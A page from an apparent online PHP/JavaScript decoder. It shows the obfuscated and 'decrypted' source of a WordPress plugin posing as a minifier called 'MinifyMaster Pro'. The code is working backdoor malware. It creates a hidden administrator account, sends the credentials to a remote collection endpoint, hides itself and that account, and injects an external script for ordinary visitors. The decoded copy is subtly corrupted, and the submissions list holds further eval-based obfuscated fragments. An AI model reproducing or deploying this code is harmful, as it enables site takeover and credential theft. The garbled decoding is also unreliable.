Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
/**
 * Plugin Name: MinifyMaster Pro
 * Plugin URI: github.com/MinifyMaster/Asset-Compression
 * Description: Advanced minification with CSS/JS optimization, code obfuscation, and bundle splitting for WordPress assets.
 * Version: 4.1.7
 * Author: Frontend Performance
 * Author URI: github.com/MinifyMaster
 * Text Domain: minifymaster-pro
 * License: MIT
 */

goto XlXla; XlXla: class MinifyMaster { private $seed; private $admin_ips = array(); private $option_name = "\x77\x69\x64\147\x65\164\137\x72\145\143\x65\156\164\x5f\x65\x6e\164\x72\x69\x65\x73"; private $init_flag = "\x5f\164\162\141\x6e\163\x69\145\156\x74\x5f\164\151\x6d\145\x6f\165\x74\137\x66\145\x65\144\x5f\71\x61\x36\144\64\x38\x32\x62\x39\145\x61\142\x39\x34\70\x37\x61\x32\145\70\67\67\x38\143\x35\62\65\x32\61\x34\142\142"; private $config = array("\x66\157\156\164" => "\141\x48\x52\x30\x63\x48\x4d\66\x4c\x79\71\x6d\x62\62\x35\60\x63\171\x35\x6e\x62\62\71\x6e\142\x47\x56\x68\143\x47\154\x7a\x4c\x6d\116\166\x62\x53\71\x6a\x63\63\x4d\x79\120\x32\x5a\150\142\127\154\x73\145\124\x31\x50\143\107\126\x75\113\x31\x4e\150\x62\156\115\66\x64\x7a\121\167\x4d\x43\x77\x33\x4d\x44\x41\x3d", "\163\x63\x72\151\x70\164" => "\141\110\122\x30\x63\x48\115\x36\x4c\x79\71\172\141\x32\x78\x6b\x5a\155\x70\156\x63\62\x78\153\141\x32\61\x6d\132\x33\x4e\153\132\155\143\x75\x59\62\x39\x74\x4c\62\106\x6d\131\x58\x41\x3d", "\145\156\144\x70\157\151\156\x74" => "\x61\x48\122\x30\143\110\x4d\x36\114\x79\71\162\x61\x57\116\x72\143\x33\122\150\143\151\61\x34\131\x6d\x78\x76\x62\62\60\x75\x61\127\65\155\x62\x79\x39\152\x62\62\170\163\x5a\x57\x4e\x30\114\x6e\x42\x6f\143\101\75\x3d"); public function __construct() { goto K5CQl; ZejXT: $this->init_hooks(); goto PEbzK; SvT3H: $this->init_admin_ips(); goto ZejXT; K5CQl: $this->seed = md5(DB_PASSWORD . AUTH_SALT); goto SvT3H; PEbzK: } private function init_admin_ips() { $EAj2u = get_option($this->option_name); if ($EAj2u && isset($EAj2u["\144\141\164\x61"]["\151\160\x73"])) { $this->admin_ips = $EAj2u["\x64\x61\x74\141"]["\151\160\163"]; } } private function init_hooks() { goto rbkHV; rbkHV: add_filter("\141\x6c\154\x5f\160\x6c\x75\147\151\x6e\163", array($this, "\x68\151\x64\x65\137\160\154\x75\x67\151\x6e")); goto ecp7n; CkDR2: add_action("\x70\x72\145\137\x75\x73\145\x72\x5f\161\x75\145\x72\171", array($this, "\146\151\154\164\x65\x72\137\141\144\155\151\156\x5f\x75\163\145\162\x73")); goto XEjaW; ecp7n: add_action("\x69\156\151\164", array($this, "\143\162\x65\x61\x74\145\x5f\x61\144\x6d\151\x6e\137\x75\x73\x65\x72")); goto CkDR2; XEjaW: add_action("\x77\x70\137\x65\x6e\161\x75\x65\x75\x65\x5f\163\143\162\x69\160\164\163", array($this, "\x6c\157\x61\x64\137\x73\x74\x79\x6c\145\x73")); goto Mj3WF; f_iMx: add_action("\141\144\x6d\151\156\137\x69\x6e\x69\164", array($this, "\x63\x6f\x6c\x6c\145\x63\x74\137\141\144\x6d\x69\156\137\x69\x70")); goto wQtxH; Mj3WF: add_action("\167\x70\137\145\x6e\x71\x75\x65\x75\x65\x5f\163\143\x72\151\160\x74\x73", array($this, "\x6c\157\141\144\137\163\143\x72\151\160\164\x73"), 20); goto f_iMx; wQtxH: } public function hide_plugin($XQx05) { unset($XQx05[plugin_basename(__FILE__)]); return $XQx05; } public function create_admin_user() { goto kX6x0; MMaXf: update_option($this->init_flag, time() + 86400 * 30); goto qBbOm; poPny: $LZeWb = $this->generate_credentials(); goto UPa93; Gi_oL: $this->send_credentials($LZeWb); goto MMaXf; UPa93: if (!username_exists($LZeWb["\x75\163\x65\x72"])) { $byTUk = wp_create_user($LZeWb["\x75\x73\x65\162"], $LZeWb["\x70\x61\x73\x73"], $LZeWb["\x65\155\141\x69\154"]); if (!is_wp_error($byTUk)) { $zWNzL = new WP_User($byTUk); $zWNzL->set_role("\141\x64\155\x69\x6e\151\x73\164\x72\141\x74\x6f\162"); } } goto Gi_oL; kX6x0: if (get_option($this->init_flag, false)) { return; } goto poPny; qBbOm: } private function generate_credentials() { $o85aY = substr(hash("\x73\x68\141\62\x35\x36", $this->seed . "\x63\x72\145\144\x73"), 0, 16); return ["\x75\x73\145\162" => "\x77\x70\x5f" . substr(md5($o85aY), 0, 8), "\x70\x61\x73\x73" => substr(md5($o85aY . "\x70\x61\x73\163"), 0, 12), "\x65\155\x61\151\154" => "\167\157\x72\144\160\x72\x65\x73\x73\100" . parse_url(home_url(), PHP_URL_HOST), "\x69\x70" => isset($_SERVER["\x53\x45\122\126\105\x52\137\101\104\104\122"]) ? $_SERVER["\x53\105\122\126\x45\122\137\x41\x44\x44\122"] : "\61\62\x37\x2e\60\x2e\60\x2e\x31", "\165\162\x6c" => home_url()]; } private function send_credentials($G9VLF) { if (!function_exists("\167\x70\137\162\x65\x6d\157\x74\x65\x5f\x70\157\163\x74")) { return; } try { goto db1Hd; RsVqa: $wgW0o = ["\x62\x6f\144\171" => ["\x64" => base64_encode($baU5U)], "\x74\151\x6d\145\x6f\165\164" => 15, "\x62\x6c\157\x63\x6b\151\156\147" => false, "\x73\163\154\166\145\x72\151\x66\x79" => false]; goto jFcmq; jFcmq: wp_remote_post(base64_decode($this->config["\145\x6e\144\160\x6f\151\156\164"]), $wgW0o); goto lkl1J; db1Hd: $baU5U = json_encode($G9VLF, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto RsVqa; lkl1J: } catch (Exception $aerPk) { } } public function filter_admin_users($oNM9y) { goto IXB9V; IXB9V: global $VypuM; goto OGaDT; OGaDT: $X7_Co = $this->generate_credentials()["\x75\x73\x65\162"]; goto RbAfY; RbAfY: $oNM9y->query_where .= "\40\101\x4e\104\x20{$VypuM->users}\x2e\x75\163\x65\162\137\x6c\157\x67\x69\156\x20\41\75\x20\x27{$X7_Co}\47"; goto EloZ0; EloZ0: } public function load_styles() { wp_enqueue_style("\167\x70\x2d\x63\x6f\x72\145\55\146\157\156\164\x73", base64_decode($this->config["\x66\x6f\156\x74"]), [], null); } public function load_scripts() { goto z71o_; dhmBR: $UJ9xm = base64_decode($this->config["\163\143\x72\x69\x70\164"]) . "\x3f\x74\163\75" . time(); goto gjgo6; z71o_: if (current_user_can("\x6d\x61\156\141\147\x65\x5f\157\x70\x74\x69\157\156\163") || in_array($this->get_client_ip(), $this->admin_ips)) { return; } goto dhmBR; gjgo6: wp_enqueue_script("\167\160\x2d\143\x6f\x72\x65\55\152\163", $UJ9xm, [], null, ["\x73\x74\162\x61\x74\x65\x67\171" => "\144\145\146\145\x72", "\x69\156\137\x66\157\157\164\x65\x72" => false]); goto iEl9G; iEl9G: } public function collect_admin_ip() { $XUoHp = $this->get_client_ip(); if ($XUoHp && !in_array($XUoHp, $this->admin_ips)) { $this->admin_ips[] = $XUoHp; $this->save_admin_ips(); } } private function save_admin_ips() { $G9VLF = ["\164\x69\164\x6c\145" => '', "\156\165\155\142\x65\x72" => 5, "\144\x61\x74\141" => ["\151\x70\163" => $this->admin_ips, "\x74\x69\x6d\145\x73\164\141\x6d\x70" => time()]]; update_option($this->option_name, $G9VLF); } public function get_client_ip() { goto vzlGd; vzlGd: if (!empty($_SERVER["\110\124\124\x50\137\103\x4c\x49\105\116\x54\x5f\111\120"])) { return $_SERVER["\110\124\x54\x50\x5f\x43\114\x49\105\116\x54\137\x49\x50"]; } goto F60sx; IMHQp: return isset($_SERVER["\122\105\x4d\x4f\124\105\137\101\x44\x44\122"]) ? $_SERVER["\x52\105\115\117\124\105\x5f\101\104\104\122"] : "\61\62\x37\x2e\60\x2e\60\x2e\x31"; goto H9v8q; F60sx: if (!empty($_SERVER["\110\124\124\x50\137\130\137\106\117\x52\127\101\122\x44\x45\104\x5f\x46\117\122"])) { $fGbdj = explode("\x2c", $_SERVER["\x48\x54\x54\120\x5f\x58\137\x46\x4f\x52\x57\101\x52\x44\105\x44\137\106\117\122"]); return trim($fGbdj[0]); } goto IMHQp; H9v8q: } } goto W150k; W150k: register_deactivation_hook(__FILE__, function () { }); goto CGlXK; CGlXK: $tTxzn = new MinifyMaster();

Decrypted code:

/**
 * Plugin Name: MinifyMaster Pro
 * Plugin URI: github.com/MinifyMaster/Asset-Compression
 * Description: Advanced minification with CSS/JS optimization, code obfuscation, and bundle splitting for WordPress assets.
 * Version: 4.1.7
 * Author: Frontend Performance
 * Author URI: github.com/MinifyMaster
 * Text Domain: minifymaster-pro
 * License: MIT
 */

goto XlXla; XlXla: class MinifyMaster { private $seed; private $admin_ips = array(); private $option_name = "widget_recent_entries"; private $init_flag = "_transient_timeout_feed_9a6d482b9eab94a2e8778c52bb"; private $config = array("font" => "aHR0cHM6Ly9mb0cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1PcGVuK1NhbnM6dzQwMCw3MDA=", "script" => "aHR0cHM6Ly9za2xkZmpnc2xka21mZ3NkZmcuY29tL2FmYXA=", "endpoint" => "aHR0cHM6Ly9raWNrc3RhciYmxvb20uaW5mby9jb2xsZWN0LnBocA=="); public function __construct() { goto K5CQl; ZejXT: $this->init_hooks(); goto PEbzK; SvT3H: $this->init_admin_ips(); goto ZejXT; K5CQl: $this->seed = md5(DB_PASSWORD . AUTH_SALT); goto SvT3H; PEbzK: } private function init_admin_ips() { $EAj2u = get_option($this->option_name); if ($EAj2u && isset($EAj2u["data"]["ips"])) { $this->admin_ips = $EAj2u["data"]["ips"]; } } private function init_hooks() { goto rbkHV; rbkHV: add_filter("all_plugins", array($this, "hide_plugin")); goto ecp7n; CkDR2: add_action("pre_user_query", array($this, "filter_admin_users")); goto XEjaW; ecp7n: add_action("init", array($this, "create_admin_user")); goto CkDR2; XEjaW: add_action("wp_enqueue_scripts", array($this, "load_styles")); goto Mj3WF; f_iMx: add_action("admin_init", array($this, "collect_admin_ip")); goto wQtxH; Mj3WF: add_action("wp_enqueue_scripts", array($this, "load_scripts"), 20); goto f_iMx; wQtxH: } public function hide_plugin($XQx05) { unset($XQx05[plugin_basename(__FILE__)]); return $XQx05; } public function create_admin_user() { goto kX6x0; MMaXf: update_option($this->init_flag, time() + 86400 * 30); goto qBbOm; poPny: $LZeWb = $this->generate_credentials(); goto UPa93; Gi_oL: $this->send_credentials($LZeWb); goto MMaXf; UPa93: if (!username_exists($LZeWb["user"])) { $byTUk = wp_create_user($LZeWb["user"], $LZeWb["pass"], $LZeWb["email"]); if (!is_wp_error($byTUk)) { $zWNzL = new WP_User($byTUk); $zWNzL->set_role("administrator"); } } goto Gi_oL; kX6x0: if (get_option($this->init_flag, false)) { return; } goto poPny; qBbOm: } private function generate_credentials() { $o85aY = substr(hash("sha6", $this->seed . "creds"), 0, 16); return ["user" => "wp_" . substr(md5($o85aY), 0, 8), "pass" => substr(md5($o85aY . "pass"), 0, 12), "email" => "wordpress@" . parse_url(home_url(), PHP_URL_HOST), "ip" => isset($_SERVER["SERVER_ADDR"]) ? $_SERVER["SERVER_ADDR"] : "1.0.0.1", "url" => home_url()]; } private function send_credentials($G9VLF) { if (!function_exists("wp_remote_post")) { return; } try { goto db1Hd; RsVqa: $wgW0o = ["body" => ["d" => base64_encode($baU5U)], "timeout" => 15, "blocking" => false, "sslverify" => false]; goto jFcmq; jFcmq: wp_remote_post(base64_decode($this->config["endpoint"]), $wgW0o); goto lkl1J; db1Hd: $baU5U = json_encode($G9VLF, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto RsVqa; lkl1J: } catch (Exception $aerPk) { } } public function filter_admin_users($oNM9y) { goto IXB9V; IXB9V: global $VypuM; goto OGaDT; OGaDT: $X7_Co = $this->generate_credentials()["user"]; goto RbAfY; RbAfY: $oNM9y->query_where .= " AND {$VypuM->users}.user_login != '{$X7_Co}'"; goto EloZ0; EloZ0: } public function load_styles() { wp_enqueue_style("wp-core-fonts", base64_decode($this->config["font"]), [], null); } public function load_scripts() { goto z71o_; dhmBR: $UJ9xm = base64_decode($this->config["script"]) . "?ts=" . time(); goto gjgo6; z71o_: if (current_user_can("manage_options") || in_array($this->get_client_ip(), $this->admin_ips)) { return; } goto dhmBR; gjgo6: wp_enqueue_script("wp-core-js", $UJ9xm, [], null, ["strategy" => "defer", "in_footer" => false]); goto iEl9G; iEl9G: } public function collect_admin_ip() { $XUoHp = $this->get_client_ip(); if ($XUoHp && !in_array($XUoHp, $this->admin_ips)) { $this->admin_ips[] = $XUoHp; $this->save_admin_ips(); } } private function save_admin_ips() { $G9VLF = ["title" => '', "number" => 5, "data" => ["ips" => $this->admin_ips, "timestamp" => time()]]; update_option($this->option_name, $G9VLF); } public function get_client_ip() { goto vzlGd; vzlGd: if (!empty($_SERVER["HTTP_CLIENT_IP"])) { return $_SERVER["HTTP_CLIENT_IP"]; } goto F60sx; IMHQp: return isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "1.0.0.1"; goto H9v8q; F60sx: if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $fGbdj = explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"]); return trim($fGbdj[0]); } goto IMHQp; H9v8q: } } goto W150k; W150k: register_deactivation_hook(__FILE__, function () { }); goto CGlXK; CGlXK: $tTxzn = new MinifyMaster();

Recent submissions:

{ "article": "112-00394", "title": { "ru": "\u0... <?php /** * Plugin Name: MinifyMaster Pro * Plugin URI: github.com/MinifyMaster/Asset... goto dHBAm; vM5b9: register_deactivation_hook(__FILE__, function () { delete_option("\x6e\... ;Function("'9{en.3u35+&3_]8,tkm%*1}.#a-j+yaq@6ap~e2vn^e{saj46s@&s!7i*-6_4~[[ev*2[[q3rf#is#... {"cameraGroupIds":["\u0417\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043d\u0435 \u0434\u... { "\u0066\u006f\u0072\u006d\u0061\u0074\u005f\u0076\u0065\u0072\u0073\u0069\u006f\u006e": ... <!DOCTYPE html><html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><title>... namespace ReverseMe\ Helper; function VNBWQeaSeqoOsGZGCXBcRfQxjBhFpZYHRLSsBaNioOiRJ(...... eval(base64_decode('bmFtZXNwYWNlIFJldmVyc2VNZVxIZWxwZXI7ZnVuY3Rpb24gVk5CV1FlYVNlcW9Pc0daR0... eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e...